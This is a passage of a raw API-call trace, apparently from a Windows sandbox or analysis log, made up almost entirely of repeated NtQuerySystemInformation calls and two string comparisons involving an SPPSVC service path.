ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0281.086] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0281.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0281.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0281.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0281.095] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0281.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0281.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0281.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0281.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, 